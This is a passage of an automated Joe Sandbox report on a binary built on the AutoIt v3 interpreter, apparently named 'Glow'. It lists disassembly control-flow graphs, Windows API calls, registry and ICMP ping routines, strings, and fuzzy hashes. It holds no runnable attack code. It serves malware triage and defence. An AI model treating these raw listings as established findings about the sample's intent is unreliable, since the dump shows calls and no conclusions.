                                                                                                                                                                          control_flow_graph 356 38370f-383724 357 383784-383786 356->357 358 383726-383729 356->358 357->358 359 383788 357->359 360 38378a 358->360 361 38372b-383732 358->361 362 38376f-383777 DefWindowProcW 359->362 363 3c3df4-3c3e1c call 382f92 call 39f23c 360->363 364 383790-383795 360->364 365 383738-38373d 361->365 366 383804-38380c PostQuitMessage 361->366 367 38377d-383783 362->367 398 3c3e21-3c3e28 363->398 369 3837bc-3837e3 SetTimer RegisterWindowMessageW 364->369 370 383797-38379a 364->370 371 383743-383747 365->371 372 3c3e61-3c3e75 call 3ec8f7 365->372 368 3837b8-3837ba 366->368 368->367 369->368 376 3837e5-3837f0 CreatePopupMenu 369->376 374 3837a0-3837b3 KillTimer call 383907 call 3859ff 370->374 375 3c3d95-3c3d98 370->375 377 38374d-383752 371->377 378 38380e-383818 call 39fcad 371->378 372->368 389 3c3e7b 372->389 374->368 383 3c3d9a-3c3d9e 375->383 384 3c3dd0-3c3def MoveWindow 375->384 376->368 386 383758-38375d 377->386 387 3c3e46-3c3e4d 377->387 391 38381d 378->391 392 3c3dbf-3c3dcb SetFocus 383->392 393 3c3da0-3c3da3 383->393 384->368 396 3837f2-383802 call 38381f 386->396 397 383763-383769 386->397 387->362 395 3c3e53-3c3e5c call 3e1423 387->395 389->362 391->368 392->368 393->397 399 3c3da9-3c3dba call 382f92 393->399 395->362 396->368 397->362 397->398 398->362 404 3c3e2e-3c3e41 call 383907 call 38396b 398->404 399->368 404->362
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00383709,?,?), ref: 00383777
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00383709,?,?), ref: 003837A3
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003837C6
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00383709,?,?), ref: 003837D1
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 003837E5
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00383806
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                          • String ID: 0$E$0$E$TaskbarCreated
                                                                                                                                                                          • API String ID: 129472671-4165878218
                                                                                                                                                                          • Opcode ID: 72c3724dd272ed20b9946d52ff288e38dd51f635da0b75729073ee779e8c94e5
                                                                                                                                                                          • Instruction ID: 68f6fd2633b59d46f36626d05dc0025601b1e718a5b7d74bd11074eab4e2f997
                                                                                                                                                                          • Opcode Fuzzy Hash: 72c3724dd272ed20b9946d52ff288e38dd51f635da0b75729073ee779e8c94e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 5641C4F1240344BBDB173B38CD59BA93B69E706B01F008176F90299392DAB4DF448769

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 412 3c09db-3c0a0b call 3c07af 415 3c0a0d-3c0a18 call 3af636 412->415 416 3c0a26-3c0a32 call 3b5594 412->416 421 3c0a1a-3c0a21 call 3af649 415->421 422 3c0a4b-3c0a94 call 3c071a 416->422 423 3c0a34-3c0a49 call 3af636 call 3af649 416->423 432 3c0cfd-3c0d03 421->432 430 3c0a96-3c0a9f 422->430 431 3c0b01-3c0b0a GetFileType 422->431 423->421 434 3c0ad6-3c0afc GetLastError call 3af613 430->434 435 3c0aa1-3c0aa5 430->435 436 3c0b0c-3c0b3d GetLastError call 3af613 CloseHandle 431->436 437 3c0b53-3c0b56 431->437 434->421 435->434 441 3c0aa7-3c0ad4 call 3c071a 435->441 436->421 451 3c0b43-3c0b4e call 3af649 436->451 439 3c0b5f-3c0b65 437->439 440 3c0b58-3c0b5d 437->440 444 3c0b69-3c0bb7 call 3b54dd 439->444 445 3c0b67 439->445 440->444 441->431 441->434 454 3c0bb9-3c0bc5 call 3c092b 444->454 455 3c0bc7-3c0beb call 3c04cd 444->455 445->444 451->421 454->455 461 3c0bef-3c0bf9 call 3b8a2e 454->461 462 3c0bed 455->462 463 3c0bfe-3c0c41 455->463 461->432 462->461 464 3c0c62-3c0c70 463->464 465 3c0c43-3c0c47 463->465 468 3c0cfb 464->468 469 3c0c76-3c0c7a 464->469 465->464 467 3c0c49-3c0c5d 465->467 467->464 468->432 469->468 471 3c0c7c-3c0caf CloseHandle call 3c071a 469->471 474 3c0cb1-3c0cdd GetLastError call 3af613 call 3b56a6 471->474 475 3c0ce3-3c0cf7 471->475 474->475 475->468
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003C071A: CreateFileW.KERNEL32(00000000,00000000,?,003C0A84,?,?,00000000,?,003C0A84,00000000,0000000C), ref: 003C0737
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003C0AEF
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003C0AF6
                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 003C0B02
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003C0B0C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003C0B15
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003C0B35
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 003C0C7F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003C0CB1
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003C0CB8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                          • Opcode ID: a23c6d83598c97cb7c7833e9869039da17116db9b7240b25d475d9d017742511
                                                                                                                                                                          • Instruction ID: 37da8666ae74c6d80e0c37063ce5b64bd8eee11e8f604157f3fb551284741054
                                                                                                                                                                          • Opcode Fuzzy Hash: a23c6d83598c97cb7c7833e9869039da17116db9b7240b25d475d9d017742511
                                                                                                                                                                          • Instruction Fuzzy Hash: F5A1F432A042989FDF1EEF68D892BAD7BA0EB06324F14425DF811DF2A1D7319D12CB55

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00385594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 003855B2
                                                                                                                                                                            • Part of subcall function 00385238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038525A
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003853C4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003C4BFD
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003C4C3E
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 003C4C80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003C4CE7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003C4CF6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                          • Opcode ID: 720f435445057cdd7bf8e42c8541d24d2a3cee4471b952c77507782676798c6c
                                                                                                                                                                          • Instruction ID: 0b84945e3777f6236548afffabe79d90906fc92c1b7b2505397be92462d53ea7
                                                                                                                                                                          • Opcode Fuzzy Hash: 720f435445057cdd7bf8e42c8541d24d2a3cee4471b952c77507782676798c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: C9719071504301ABC306EF65E89199ABBE8FF59781F40442EF841CB172DB71DA48CB55

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 003834DE
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003834ED
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00383503
                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00383515
                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00383527
                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0038353F
                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00383590
                                                                                                                                                                            • Part of subcall function 00383624: GetSysColorBrush.USER32(0000000F), ref: 00383657
                                                                                                                                                                            • Part of subcall function 00383624: RegisterClassExW.USER32(00000030), ref: 00383681
                                                                                                                                                                            • Part of subcall function 00383624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383692
                                                                                                                                                                            • Part of subcall function 00383624: InitCommonControlsEx.COMCTL32(?), ref: 003836AF
                                                                                                                                                                            • Part of subcall function 00383624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003836BF
                                                                                                                                                                            • Part of subcall function 00383624: LoadIconW.USER32(000000A9), ref: 003836D5
                                                                                                                                                                            • Part of subcall function 00383624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003836E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                          • Opcode ID: 6309eff3c948e8a1616791bfed6a060f6c94a3be9b22baa3d9b628d33c13c37d
                                                                                                                                                                          • Instruction ID: c728444f190fd1225ce98abf50862b1b2d2eb8fa27c104be0ccfab715aee8a9a
                                                                                                                                                                          • Opcode Fuzzy Hash: 6309eff3c948e8a1616791bfed6a060f6c94a3be9b22baa3d9b628d33c13c37d
                                                                                                                                                                          • Instruction Fuzzy Hash: 26213DB0E00314ABDB109FA5ED45A997FB4FB09B51F00403BEA04A62A1D3F985448F98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 553 400fb8-400fef call 38e6a0 556 400ff1-400ffe call 38c98d 553->556 557 40100f-401021 WSAStartup 553->557 556->557 566 401000-40100b call 38c98d 556->566 559 401023-401031 557->559 560 401054-401091 call 39c1f6 call 388ec0 call 39f9d4 inet_addr gethostbyname 557->560 563 401033 559->563 564 401036-401046 559->564 576 4010a2-4010b0 560->576 577 401093-4010a0 IcmpCreateFile 560->577 563->564 567 401048 564->567 568 40104b-40104f 564->568 566->557 567->568 569 401249-401251 568->569 579 4010b2 576->579 580 4010b5-4010c5 576->580 577->576 578 4010d3-401100 call 3a017b call 38423c 577->578 589 401102-401129 IcmpSendEcho 578->589 590 40112b-401148 IcmpSendEcho 578->590 579->580 581 4010c7 580->581 582 4010ca-4010ce 580->582 581->582 584 401240-401244 call 38bd98 582->584 584->569 591 40114c-40114e 589->591 590->591 592 401150-401155 591->592 593 4011ae-4011bc 591->593 596 4011f8-40120a call 38e6a0 592->596 597 40115b-401160 592->597 594 4011c1-4011c8 593->594 595 4011be 593->595 598 4011e4-4011ed 594->598 595->594 611 401210 596->611 612 40120c-40120e 596->612 599 401162-401167 597->599 600 4011ca-4011d8 597->600 604 4011f2-4011f6 598->604 605 4011ef 598->605 599->593 606 401169-40116e 599->606 602 4011da 600->602 603 4011dd 600->603 602->603 603->598 608 401212-401229 IcmpCloseHandle WSACleanup 604->608 605->604 609 401170-401175 606->609 610 401193-4011a1 606->610 608->584 616 40122b-40123d call 3a013d call 3a0184 608->616 609->600 613 401177-401185 609->613 614 4011a3 610->614 615 4011a6-4011ac 610->615 611->608 612->608 618 401187 613->618 619 40118a-401191 613->619 614->615 615->598 616->584 618->619 619->598
                                                                                                                                                                          APIs
                                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00401019
                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 00401079
                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00401085
                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00401093
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00401123
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00401142
                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00401216
                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 0040121C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                          • Opcode ID: f960a6341e6fde61643a47554dc9c6be263cc54d125c7b997355b88ed4779340
                                                                                                                                                                          • Instruction ID: 31442490fa3fd115018a2d50ec9914c25bf65898bef1db60ee9defec7ea7517c
                                                                                                                                                                          • Opcode Fuzzy Hash: f960a6341e6fde61643a47554dc9c6be263cc54d125c7b997355b88ed4779340
                                                                                                                                                                          • Instruction Fuzzy Hash: 9991CE71604201AFD724DF14C884B16BBE0EF49318F1485AAF569AF7B2C738EC46CB85
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Variable must be of type 'Object'.$t5E$t5E$t5E$t5E$t5Et5E
                                                                                                                                                                          • API String ID: 0-1084035763
                                                                                                                                                                          • Opcode ID: f0a0d9e4b7d89d1aa71cdea290f799943e77c2b8d02ed726c49a8e8aa7e16409
                                                                                                                                                                          • Instruction ID: ea7377191336e48422f0b79217b37fe0a3d3f4c25aa9fdb870f127de63765afd
                                                                                                                                                                          • Opcode Fuzzy Hash: f0a0d9e4b7d89d1aa71cdea290f799943e77c2b8d02ed726c49a8e8aa7e16409
                                                                                                                                                                          • Instruction Fuzzy Hash: D9C29B75E00205DFCB26EF68D880AADB7B1FF09310F2585AAE945AB391D375ED41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 003915F2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: t5E$t5E$t5E$t5E$t5Et5E
                                                                                                                                                                          • API String ID: 1385522511-3529596602
                                                                                                                                                                          • Opcode ID: 1a39da5e160d521b2e8622429bb6c0d29ca6406303bd61d41959d0792f55f6c2
                                                                                                                                                                          • Instruction ID: 0e1869af1b6685fa23f71874bb07bccbc0806967371104363ca81b6e5ead3060
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a39da5e160d521b2e8622429bb6c0d29ca6406303bd61d41959d0792f55f6c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB28975A08301CFDB2ACF18C480A2AB7E1BF99300F25495EE9969B352D771ED45CF92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003832AF
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 003832B7
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003832C2
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003832CD
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 003832D5
                                                                                                                                                                            • Part of subcall function 0038327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 003832DD
                                                                                                                                                                            • Part of subcall function 00383205: RegisterWindowMessageW.USER32(00000004,?,00382964), ref: 0038325D
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00382A0A
                                                                                                                                                                          • OleInitialize.OLE32 ref: 00382A28
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 003C3A0D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                          • String ID: (&E$0$E$4'E$d(E$$E
                                                                                                                                                                          • API String ID: 1986988660-2707072083
                                                                                                                                                                          • Opcode ID: 7ce576f443645ee3709bfa39f8831abe31e30ca37b622f7452083fa42c2a6e21
                                                                                                                                                                          • Instruction ID: 9d66b7a5b25be54466d843a6e6c49cdef0a1852c011c57ab7bd370079c4f4fb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce576f443645ee3709bfa39f8831abe31e30ca37b622f7452083fa42c2a6e21
                                                                                                                                                                          • Instruction Fuzzy Hash: 9071BBB0911308AFC789EF69AF656153BE0BB5A302300827BD409DB263FBB48545CF5C

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1633 3b90c5-3b90d5 1634 3b90ef-3b90f1 1633->1634 1635 3b90d7-3b90ea call 3af636 call 3af649 1633->1635 1637 3b9459-3b9466 call 3af636 call 3af649 1634->1637 1638 3b90f7-3b90fd 1634->1638 1651 3b9471 1635->1651 1656 3b946c call 3b2b5c 1637->1656 1638->1637 1641 3b9103-3b912e 1638->1641 1641->1637 1644 3b9134-3b913d 1641->1644 1647 3b913f-3b9152 call 3af636 call 3af649 1644->1647 1648 3b9157-3b9159 1644->1648 1647->1656 1649 3b915f-3b9163 1648->1649 1650 3b9455-3b9457 1648->1650 1649->1650 1654 3b9169-3b916d 1649->1654 1655 3b9474-3b9479 1650->1655 1651->1655 1654->1647 1658 3b916f-3b9186 1654->1658 1656->1651 1661 3b9188-3b918b 1658->1661 1662 3b91a3-3b91ac 1658->1662 1664 3b918d-3b9193 1661->1664 1665 3b9195-3b919e 1661->1665 1666 3b91ca-3b91d4 1662->1666 1667 3b91ae-3b91c5 call 3af636 call 3af649 call 3b2b5c 1662->1667 1664->1665 1664->1667 1668 3b923f-3b9259 1665->1668 1670 3b91db-3b91dc call 3b3b93 1666->1670 1671 3b91d6-3b91d8 1666->1671 1699 3b938c 1667->1699 1672 3b925f-3b926f 1668->1672 1673 3b932d-3b9336 call 3bfc1b 1668->1673 1677 3b91e1-3b91f9 call 3b2d38 * 2 1670->1677 1671->1670 1672->1673 1676 3b9275-3b9277 1672->1676 1686 3b93a9 1673->1686 1687 3b9338-3b934a 1673->1687 1676->1673 1680 3b927d-3b92a3 1676->1680 1702 3b91fb-3b9211 call 3af649 call 3af636 1677->1702 1703 3b9216-3b923c call 3b97a4 1677->1703 1680->1673 1684 3b92a9-3b92bc 1680->1684 1684->1673 1689 3b92be-3b92c0 1684->1689 1691 3b93ad-3b93c5 ReadFile 1686->1691 1687->1686 1692 3b934c-3b935b GetConsoleMode 1687->1692 1689->1673 1694 3b92c2-3b92ed 1689->1694 1696 3b9421-3b942c GetLastError 1691->1696 1697 3b93c7-3b93cd 1691->1697 1692->1686 1698 3b935d-3b9361 1692->1698 1694->1673 1701 3b92ef-3b9302 1694->1701 1704 3b942e-3b9440 call 3af649 call 3af636 1696->1704 1705 3b9445-3b9448 1696->1705 1697->1696 1706 3b93cf 1697->1706 1698->1691 1707 3b9363-3b937d ReadConsoleW 1698->1707 1700 3b938f-3b9399 call 3b2d38 1699->1700 1700->1655 1701->1673 1713 3b9304-3b9306 1701->1713 1702->1699 1703->1668 1704->1699 1710 3b944e-3b9450 1705->1710 1711 3b9385-3b938b call 3af613 1705->1711 1717 3b93d2-3b93e4 1706->1717 1708 3b937f GetLastError 1707->1708 1709 3b939e-3b93a7 1707->1709 1708->1711 1709->1717 1710->1700 1711->1699 1713->1673 1720 3b9308-3b9328 1713->1720 1717->1700 1724 3b93e6-3b93ea 1717->1724 1720->1673 1728 3b93ec-3b93fc call 3b8de1 1724->1728 1729 3b9403-3b940e 1724->1729 1738 3b93ff-3b9401 1728->1738 1731 3b941a-3b941f call 3b8c21 1729->1731 1732 3b9410 call 3b8f31 1729->1732 1739 3b9415-3b9418 1731->1739 1732->1739 1738->1700 1739->1738
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: de0c8b310357cc53faf4275a8bd3eb5045fd09a3e2cd95344302bf67f524320b
                                                                                                                                                                          • Instruction ID: fca09ec377223c0598b3b54f518f532187a3dc33ee4b65e68fa3c0a5521e3f0b
                                                                                                                                                                          • Opcode Fuzzy Hash: de0c8b310357cc53faf4275a8bd3eb5045fd09a3e2cd95344302bf67f524320b
